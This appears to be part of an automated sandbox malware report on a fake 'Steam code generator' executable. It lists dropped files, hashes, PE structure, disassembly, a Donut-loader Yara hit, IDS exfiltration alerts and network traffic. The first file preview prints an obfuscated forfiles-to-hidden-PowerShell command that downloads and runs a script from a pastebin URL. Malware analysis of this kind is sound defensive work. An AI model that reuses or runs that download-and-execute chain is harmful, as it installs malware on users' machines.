                                                                      Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
                                                                      Process:C:\Users\user\Desktop\steamcodegenerator.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):39510
                                                                      Entropy (8bit):7.693386599727056
                                                                      Encrypted:false
                                                                      SSDEEP:768:J8AiMUiDCHFlDY8E5X+2ewgdXC8pgpfcS7iKGztVuanh8w2OfJ:J8EUsCHFlDY3+2YBC8WJcS7i9u6ye
                                                                      MD5:EBE145BD87E74B4BCA45E87525372F04
                                                                      SHA1:EBE63CBA99F213980C7A94BACD580B347D740D4E
                                                                      SHA-256:A53308B29B375BBE5140B8FC3781FE0E2F0F6F06A447C0F27AC9189F20B2F4B1
                                                                      SHA-512:BFECFC20EAA3A62D58EDBFF2B5F69A75A382BFB58AFB3D3CB19FFEDC2A9E7AB3319BF714088B8586613419ECF4FCAC6C04CDA8AB75B0C86BF977F7164D05C463
                                                                      Malicious:false
                                                                      Yara Hits:
                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stm[1].txt, Author: unknown
                                                                      Preview:..e...e..0g.p.1.....>..E.$*...i..1..........YD(..h'@..b..-.S!.#hz..T2.X!;Ys.N.m0dyD;d9.x.....X..e..S.._..D&g*'ZG..z..)o.M.(C..@...8..H1........Sx[.^U.F.Ne8;IC....-..5Oua...|..x7T.m?H/~..~...9^.......q.u&.....U%=7..]..J.q.Ip.&{.4..[.......`..e......kx<....&..{..U.|..B.6jp)...!l.W{(].&(.y..1..-._.&.S.Nn.X..O..^2.L...%.XoYZ.....+t..z?.....l...+$.u.S./?...8..\7K.P=.m..Z.0..5.6...2]....Y.b.m.mG.Wn$A..Z.6.T._...?~H.U...+.(W]%...&.+..T.n..%..n.U...W.e&m...%..]...A^.).j;{<y.~..m-&........f...<.UP.x..o.dnI..$.p..!.{.rA...E.Yc.9..........................n..R]_..$.._.T.A*.......o.g.2...:/[.N..rx0..91h.3....g.`......zf..C.v.r....&......r.6`..G..L..2.FTb..o..HDKw.F.-.w.}..g).-B-zv......F...g.Q.#a.C.B.!.UZ.s-..S..._Q28KmR...2.NOu...b..'.C3w.b.Q...<..9Q.....`.....D..@x_...q.3.>.9^.bn.......Fc..[...8..f..%..ioT...O...4.5RW.......e.7.A@xz.6...8...u........g........@"..Mp.^....'.k........<...m.O.J.`.$.y...M&.r.Z...h.)!Hp.......>.$....G.X.|It2...8p._.3....
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):11608
                                                                      Entropy (8bit):4.890472898059848
                                                                      Encrypted:false
                                                                      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                      MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                      SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                      SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                      SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1600
                                                                      Entropy (8bit):5.684177275916648
                                                                      Encrypted:false
                                                                      SSDEEP:48:1SU4Yymdax4RIoUP7m9qr9tK8NfxBUICmL6o882:MHYv+IfB9qr2KfnUjmLe
                                                                      MD5:6048C2B80F3FB9BEAAE93AD9882F22C2
                                                                      SHA1:E6EACA319D363A76EFE3C852B6C28A877AE39DC5
                                                                      SHA-256:EB0FB9EAE7D24D7773066307FFCA4379B579FF9E938CA32863995917EC088461
                                                                      SHA-512:DE7FB44922ACE117530971C1A89059342CDDC2008469B7CB51A757755DDC7739C8B2F26C0DFA1FBC0CBE55EC889A7AA45450BEC8AE72BA51C8050F5499695258
                                                                      Malicious:false
                                                                      Preview:@...e...........Q...................R.9.O............@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Users\user\Desktop\steamcodegenerator.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):46
                                                                      Entropy (8bit):4.898455706009979
                                                                      Encrypted:false
                                                                      SSDEEP:3:i9CLLWD07v:wCLue
                                                                      MD5:2C1D951199DEAC5063E37780D924EDCE
                                                                      SHA1:752DCAF6C502CA0F526BA68E2865129B4157A977
                                                                      SHA-256:E7C4677A9BA467D8FEA67DACCB0B752409FDB2DB344DC6E82A966A313E511D55
                                                                      SHA-512:F154209296157A6D05BC970582409646DCDD7E5F52ED512ACFC4FFCDF549B4BC6D27C3FC7A0AE7C3D38641D4E2CB364FA4BBDF30485286732AF4D1B216D22A47
                                                                      Malicious:false
                                                                      Preview:Generating.....Steam Code: TZVF4-DI30M-P.TQW..
                                                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                                                      Entropy (8bit):6.2652516764461375
                                                                      TrID:
                                                                      • Win64 Executable Console (202006/5) 92.65%
                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:steamcodegenerator.exe
                                                                      File size:258'048 bytes
                                                                      MD5:d4f1751389516a3dfac98551142cb153
                                                                      SHA1:f362178e1ecd3eac536b666e89c2aa5663109116
                                                                      SHA256:eb727ad773925864801802b58b3060cfb1a0c18c1be78c8f9e6fc1d2840b19af
                                                                      SHA512:d3e0e04c414c26c37894efe1cdd8adf1970ede58ffac510e17315f4599178706c5ce70d47796900e011f76444e3bb52238a542f60120a7a2a94d96c8ac3d4cab
                                                                      SSDEEP:3072:IyEnMIVkwfjZrzYxopX5SfebFd+l1EkMmLmAvGaQNTxDwYPfMpOEM0UAP+Sg56:ILVDrZrzYapJQebFd+vFMmbTaThQ1UN
                                                                      TLSH:DA447B5577A50CF8EC67827DCC514A0AE6B2BC160760EB9F03A08B5B5F236E09D3E761
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...j...i...l.1.i...m...i...i...i..lm...i..lj...i..ll...i...h...i...h...i..l`...i..l....i..lk...i.Rich..i........
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x140009080
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x140000000
                                                                      Subsystem:windows cui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x67093850 [Fri Oct 11 14:38:08 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f63ec0d9e5630f984a80952b9a46676a
                                                                      Instruction
                                                                      dec eax
                                                                      sub esp, 28h
                                                                      call 00007FD1B8C9837Ch
                                                                      dec eax
                                                                      add esp, 28h
                                                                      jmp 00007FD1B8C979F7h
                                                                      int3
                                                                      int3
                                                                      dec eax
                                                                      sub esp, 28h
                                                                      call 00007FD1B8C986FCh
                                                                      test eax, eax
                                                                      je 00007FD1B8C97BA3h
                                                                      dec eax
                                                                      mov eax, dword ptr [00000030h]
                                                                      dec eax
                                                                      mov ecx, dword ptr [eax+08h]
                                                                      jmp 00007FD1B8C97B87h
                                                                      dec eax
                                                                      cmp ecx, eax
                                                                      je 00007FD1B8C97B96h
                                                                      xor eax, eax
                                                                      dec eax
                                                                      cmpxchg dword ptr [00034698h], ecx
                                                                      jne 00007FD1B8C97B70h
                                                                      xor al, al
                                                                      dec eax
                                                                      add esp, 28h
                                                                      ret
                                                                      mov al, 01h
                                                                      jmp 00007FD1B8C97B79h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      dec eax
                                                                      sub esp, 28h
                                                                      test ecx, ecx
                                                                      jne 00007FD1B8C97B89h
                                                                      mov byte ptr [00034681h], 00000001h
                                                                      call 00007FD1B8C97ED1h
                                                                      call 00007FD1B8C998A4h
                                                                      test al, al
                                                                      jne 00007FD1B8C97B86h
                                                                      xor al, al
                                                                      jmp 00007FD1B8C97B96h
                                                                      call 00007FD1B8CA6B8Bh
                                                                      test al, al
                                                                      jne 00007FD1B8C97B8Bh
                                                                      xor ecx, ecx
                                                                      call 00007FD1B8C998B4h
                                                                      jmp 00007FD1B8C97B6Ch
                                                                      mov al, 01h
                                                                      dec eax
                                                                      add esp, 28h
                                                                      ret
                                                                      int3
                                                                      int3
                                                                      inc eax
                                                                      push ebx
                                                                      dec eax
                                                                      sub esp, 20h
                                                                      cmp byte ptr [00034648h], 00000000h
                                                                      mov ebx, ecx
                                                                      jne 00007FD1B8C97BE9h
                                                                      cmp ecx, 01h
                                                                      jnbe 00007FD1B8C97BECh
                                                                      call 00007FD1B8C98672h
                                                                      test eax, eax
                                                                      je 00007FD1B8C97BAAh
                                                                      test ebx, ebx
                                                                      jne 00007FD1B8C97BA6h
                                                                      dec eax
                                                                      lea ecx, dword ptr [00034632h]
                                                                      call 00007FD1B8CA69AAh
                                                                      test eax, eax
                                                                      jne 00007FD1B8C97B92h
                                                                      dec eax
                                                                      lea ecx, dword ptr [0003463Ah]
                                                                      call 00007FD1B8C97B9Ah
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3a9340x3c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000x1e0.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3f0000x2460.pdata
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x440000x9a4.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x364600x70.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x363200x140.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x2e8.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x29f400x2a0002ad535e4366959067e2e60d8aafa7658False0.5462646484375data6.492900443589932IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x2b0000x102ee0x10400f45884d9dba838b4f775fb0b6ef92b79False0.42321213942307695data4.8807783288878275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x3c0000x2a500x14003c0e81b51e51780698ebe5ffc0a838deFalse0.162890625DOS executable (block device driver)2.705660946828352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .pdata0x3f0000x24600x2600641900e4b17ed72e996a7af8fcf39302False0.46895559210526316data5.255275322700397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      _RDATA0x420000x1f40x200093bc688e5029835ff2195256ddf5afdFalse0.494140625data3.6328021103092234IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x430000x1e00x2009866eeb93e80b773405f3d7936b83641False0.52734375data4.7074344725994175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x440000x9a40xa006e22f657667f6504de5a7699c3e54392False0.496875data5.389301065625464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_MANIFEST0x430600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                      DLLImport
                                                                      KERNEL32.dllVirtualFree, VirtualAlloc, MultiByteToWideChar, Sleep, GetLastError, WriteConsoleW, CreateFileW, HeapSize, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, RtlUnwind
                                                                      WININET.dllInternetOpenW, InternetOpenUrlW, InternetCloseHandle, InternetReadFile
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-15T15:59:53.331844+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.449742162.159.138.232443TCP
                                                                      2024-10-15T16:00:08.497087+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.449749162.159.138.232443TCP
                                                                      2024-10-15T16:00:16.360221+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.449763162.159.138.232443TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 15, 2024 15:59:26.062680960 CEST49735443192.168.2.4140.82.121.3
                                                                      Oct 15, 2024 15:59:26.062733889 CEST44349735140.82.121.3192.168.2.4
                                                                      Oct 15, 2024 15:59:26.062946081 CEST49735443192.168.2.4140.82.121.3
                                                                      Oct 15, 2024 15:59:26.104198933 CEST49735443192.168.2.4140.82.121.3
                                                                      Oct 15, 2024 15:59:26.104278088 CEST44349735140.82.121.3192.168.2.4
                                                                      Oct 15, 2024 15:59:26.958338022 CEST44349735140.82.121.3192.168.2.4
                                                                      Oct 15, 2024 15:59:26.958431005 CEST49735443192.168.2.4140.82.121.3
                                                                      Oct 15, 2024 15:59:27.099189043 CEST49735443192.168.2.4140.82.121.3
                                                                      Oct 15, 2024 15:59:27.099287033 CEST44349735140.82.121.3192.168.2.4
                                                                      Oct 15, 2024 15:59:27.099874020 CEST44349735140.82.121.3192.168.2.4
                                                                      Oct 15, 2024 15:59:27.099948883 CEST49735443192.168.2.4140.82.121.3
                                                                      Oct 15, 2024 15:59:27.105731964 CEST49735443192.168.2.4140.82.121.3
